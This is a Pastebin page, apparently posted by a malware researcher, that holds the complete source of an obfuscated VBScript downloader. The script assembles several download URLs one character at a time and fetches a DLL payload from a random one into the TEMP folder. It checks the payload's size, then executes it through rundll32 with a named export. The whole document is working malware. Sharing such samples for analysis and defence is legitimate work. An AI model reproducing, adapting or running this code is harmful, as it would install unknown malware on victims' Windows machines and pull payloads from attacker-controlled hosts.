SHARE
TWEET

Malicious script

dynamoo Nov 1st, 2016 119 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. Const Jk7 = 1, RYg6 = 2, GEi = 8
  3. Const Og = 1, DVe = 2, Jg5 = "437", SJz8 = 2
  4. Function DNk(XJw8)
  5. Dim LFr, AEd3, HJx
  6. Set LFr = CreateObject("ADODB.Stream")
  7. LFr.type = DVe
  8. LFr.Charset = Jg5
  9. LFr.Open
  10. LFr.LoadFromFile XJw8
  11. HJx = LFr.ReadText
  12. LFr.Close
  13. DNk = Yj(HJx)
  14. End Function
  15. Sub CBj(XJw8, ZJe)
  16. Dim LFr, HJx
  17. Set LFr = CreateObject("ADODB.Stream")
  18. LFr.type = DVe
  19. LFr.Charset = Jg5
  20. LFr.Open
  21. HJx = Nj2(ZJe)
  22. LFr.WriteText HJx
  23. LFr.SaveToFile XJw8, SJz8
  24. LFr.Close
  25. End Sub
  26. Function Bs8(Wk9)
  27. Dim HJx, Dd8(0)
  28. If Wk9 <= 0 Then
  29. Err.Raise 50001, "", "123", "", 0
  30. ElseIf Wk9 = 1 Then
  31. Bs8 = Dd8
  32. Else
  33. HJx = Space(Wk9-1)
  34. Bs8 = Split(HJx, " ")
  35. End If
  36. End Function
  37. Function Zq6(url)
  38. Dim YDh, Bq0, AEd3, Bg
  39. Dim OBp, MEk(1)
  40. Set YDh = CreateObject("Scripting.FileSystemObject")
  41. MEk(0) = "WinHttp.WinHttpRequest.5.1"
  42. MEk(1) = "MSXML2.XMLHTTP"
  43. For Each OBp in MEk
  44. Err.Clear
  45. Set Bq0 = CreateObject(OBp)
  46. If Err.Number = 0 Then
  47. Exit For
  48. End If
  49. Next
  50. Bq0.Open "GET", url, False
  51. Bq0.Send
  52. AEd3 = Bs8(LenB(Bq0.ResponseBody))
  53. For Bg = 1 To LenB(Bq0.ResponseBody)
  54. AEd3(Bg-1) = AscB(MidB(Bq0.ResponseBody, Bg, 1))
  55. Next
  56. Zq6 = AEd3
  57. End Function
  58. Sub Ye( RFz5, DJc )
  59. Dim Bg, Rq5, YDh, Bq0, QPn5
  60. Set YDh = CreateObject( "Scripting.FileSystemObject" )
  61. If YDh.FolderExists( DJc ) Then
  62. QPn5 = YDh.BuildPath( DJc, Mid( RFz5, InStrRev( RFz5, "/" ) + 1 ) )
  63. ElseIf YDh.FolderExists( Left( DJc, InStrRev( DJc, "\" ) - 1 ) ) Then
  64. QPn5 = DJc
  65. Else
  66. Exit Sub
  67. End If
  68. Set Rq5 = YDh.OpenTextFile( QPn5, RYg6, True )
  69. Set Bq0 = CreateObject( "WinHttp.WinHttpRequest.5.1" )
  70. Bq0.Open "GET", RFz5, False
  71. Bq0.Send
  72. If LenB(Bq0.ResponseBody) < 100000 Or LenB(Bq0.ResponseBody) > 250000 Then
  73. Err.Raise 50011, "", "received shit", "", 0
  74. Exit Sub
  75. End If
  76. For Bg = 1 To LenB( Bq0.ResponseBody )
  77. Rq5.Write Chr( AscB( MidB( Bq0.ResponseBody, Bg, 1 ) ) )
  78. Next
  79. Rq5.Close( )
  80. End Sub
  81. Function UOh()
  82. Dim BRq, TBh, Be6
  83. Set BRq = CreateObject("WScript.Shell")
  84. Set TBh = BRq.Environment("System")
  85. Be6 = TBh("PROCESSOR_ARCHITECTURE")
  86. If LCase(Be6) = "amd64" Then
  87. UOh = BRq.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  88. Else
  89. UOh = BRq.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  90. End If
  91. End Function
  92. Sub UYw0(Wi, KBq, Hk4)
  93. Dim BRq, YDh, Rq5, WWp, Jx5
  94. Set BRq = CreateObject("WScript.Shell")
  95. Set YDh = CreateObject("Scripting.FileSystemObject")
  96. Set Rq5 = YDh.GetFile(Wi)
  97. WWp = Rq5.ShortPath
  98. Jx5 = UOh() + " " + WWp + "," + KBq + " " + Hk4
  99. If 2 > 1 Then
  100. BRq.Run(Jx5)
  101. End If
  102. End Sub
  103. Function Kf7(Wi)
  104. Dim YDh
  105. Set YDh = CreateObject("Scripting.FileSystemObject")
  106. Kf7 = YDh.FileExists(Wi)
  107. End Function
  108. Function Jq0(Wi)
  109. Dim YDh, Rq5
  110. Set YDh = CreateObject("Scripting.FileSystemObject")
  111. Set Rq5 = YDh.GetFile(Wi)
  112. Jq0 = Rq5.ShortPath
  113. End Function
  114. Function Ev6(Qt, UHs)
  115. Dim Wk9
  116. Wk9 = CDbl(Int(CDbl(Qt)/CDbl(UHs)))
  117. Ev6 = CDbl(Qt) - Wk9 * CDbl(UHs)
  118. End Function
  119. Function Vp(Gx, HJx)
  120. HJx(1) = 172 * HJx(1) Mod 30307
  121. HJx(0) = 171 * HJx(0) Mod 30269
  122. HJx(2) = 170 * HJx(2) Mod 30323
  123. Dim ZWw
  124. ZWw = Ev6((CDbl(HJx(0))/30269.0 + CDbl(HJx(1))/30307.0 + CDbl(HJx(2))/30323.0), 1.0)
  125. Vp = Int(ZWw * CDbl(Gx))
  126. End Function
  127. Function Va6(HAq3)
  128. Va6 = CInt(HAq3*Rnd())
  129. End Function
  130. Sub YXi0(Wc7)
  131. WScript.Sleep(Wc7)
  132. End Sub
  133. Randomize
  134. Dim EHi(2), EKj9, HZr(4), XJw8
  135. EHi(0) = 21898
  136. EHi(1) = 24911
  137. EHi(2) = 26762
  138. EKj9 = 50
  139. If 1=1 Then
  140. HZr(0) = "ht"&"tp://" & "5" & "1" & "q" & "u" & "d" & "u" & "." & "c" & "o" & "m" & "/" & "m" & "q" & "y" & "2" & "p" & "j" & "4"
  141. End If
  142. If 1=1 Then
  143. HZr(1) = "ht"&"tp://" & "b" & "j" & "z" & "s" & "t" & "." & "c" & "n" & "/" & "q" & "g" & "q" & "4" & "d" & "x"
  144. End If
  145. If 1=1 Then
  146. HZr(2) = "ht"&"tp://" & "d" & "a" & "n" & "a" & "p" & "a" & "r" & "d" & "a" & "z" & "." & "n" & "e" & "t" & "/" & "z" & "r" & "r" & "8" & "r" & "t" & "z"
  147. End If
  148. If 1=1 Then
  149. HZr(3) = "ht"&"tp://" & "l" & "i" & "t" & "c" & "h" & "l" & "o" & "p" & "e" & "r" & "." & "c" & "o" & "m" & "/" & "6" & "6" & "q" & "p" & "o" & "s" & "7" & "m"
  150. End If
  151. If 1=1 Then
  152. HZr(4) = "ht"&"tp://" & "z" & "i" & "z" & "z" & "h" & "a" & "i" & "d" & "a" & "." & "c" & "o" & "m" & "/" & "6" & "z" & "d" & "y" & "9" & "i" & "v" & "o"
  153. End If
  154. XJw8 = "TOHYDHko8jeC3IES"
  155. Dim BRq, Yt1, Vo, Xp1, Wc7
  156. Set objShell = CreateObject("WS"&"cript.Shell")
  157. Yt1 = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%")
  158. Dim CTu, Wf, YSj, ZVv6, Bg
  159. Wf = False
  160. For Bg=0 To 10: Do
  161. Vo = Yt1 + "\" + XJw8 + Chr(48+Bg) + ".dl"&"l"
  162. If Kf7(Vo) Then
  163. Xp1 = Jq0(Vo) & ".txt"
  164. If Kf7(Xp1) Then
  165. WScript.Quit(0)
  166. End If
  167. End If
  168. If Not Wf Then
  169. CTu = Va6(UBound(HZr))
  170. Ye HZr(CTu), Vo
  171. If Err.Number <> 0 Then
  172. Exit Do
  173. End If
  174. Wf = True
  175. End If
  176. UYw0 Vo, "A"&"d"&"vancedStoragePasswordConfig", "1"&"47"
  177. WScript.Quit(1)
  178. Loop While False: Next
  179. If 3=3 Then
  180. WScript.Quit(1)
  181. End If
RAW Paste Data
Top